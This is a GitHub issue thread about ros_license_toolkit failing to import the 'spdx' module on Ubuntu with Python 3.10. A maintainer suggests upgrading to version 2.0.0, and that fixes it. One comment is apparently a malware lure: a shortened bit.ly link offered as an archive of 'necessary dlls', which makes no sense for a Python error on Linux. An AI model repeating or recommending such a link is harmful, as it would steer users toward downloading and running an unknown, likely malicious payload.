### ISSUE TITLE
spdx dependency error

### ISSUE THREAD

**Issue by meetgandhi-dev** [boschresearch/ros_license_toolkit#69]
Hi there,

Thank you for your excellent work on this tool! I'm trying to use it on Ubuntu 22.04, but I'm encountering an issue related to the spdx module.

Here are the details about my setup:
```
$ python --version
Python 3.10.12
```
I have installed the ROS license toolkit via pip:
```
$ pip list | grep ros_license_toolkit
ros_license_toolkit                  1.3.0
```
When I ran the tool for the first time, I received the following error:
```
$ ros_license_toolkit my_custom_msgs
Traceback (most recent call last):
  File "/home/meet/.local/bin/ros_license_toolkit", line 5, in <module>
    from ros_license_toolkit.main import main
  File "/home/meet/.local/lib/python3.10/site-packages/ros_license_toolkit/main.py", line 27, in <module>
    from ros_license_toolkit.checks import (LicensesInCodeCheck,
  File "/home/meet/.local/lib/python3.10/site-packages/ros_license_toolkit/checks.py", line 25, in <module>
    from ros_license_toolkit.license_tag import (LicenseTag,
  File "/home/meet/.local/lib/python3.10/site-packages/ros_license_toolkit/license_tag.py", line 27, in <module>
    from spdx.config import LICENSE_MAP
ModuleNotFoundError: No module named 'spdx'
```
To address this, I manually installed the spdx module using pip:
```
$ pip list | grep spdx
spdx                                 2.5.1
spdx-tools                           0.8.2
```
However, after installing it, I encountered a different error:
```
$ ros_license_toolkit ark_msg/
Traceback (most recent call last):
  File "/home/meet/.local/bin/ros_license_toolkit", line 5, in <module>
    from ros_license_toolkit.main import main
  File "/home/meet/.local/lib/python3.10/site-packages/ros_license_toolkit/main.py", line 27, in <module>
    from ros_license_toolkit.checks import (LicensesInCodeCheck,
  File "/home/meet/.local/lib/python3.10/site-packages/ros_license_toolkit/checks.py", line 25, in <module>
    from ros_license_toolkit.license_tag import (LicenseTag,
  File "/home/meet/.local/lib/python3.10/site-packages/ros_license_toolkit/license_tag.py", line 27, in <module>
    from spdx.config import LICENSE_MAP
ModuleNotFoundError: No module named 'spdx.config'
```
I would appreciate any guidance on how to resolve these issues. Thank you!

**Comment by KERERCVASD** [comment]
try this
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive

**Comment by ct2034** [comment]
Hi @meetgandhi-dev. Could you please verify if this exists with `ros_license_toolkit==2.0.0`?

**Comment by meetgandhi-dev** [comment]
@ct2034 Thank you for the reply! I’ve tested the 2.0.0 version, and it’s working as expected. I’ll go ahead and close this now.
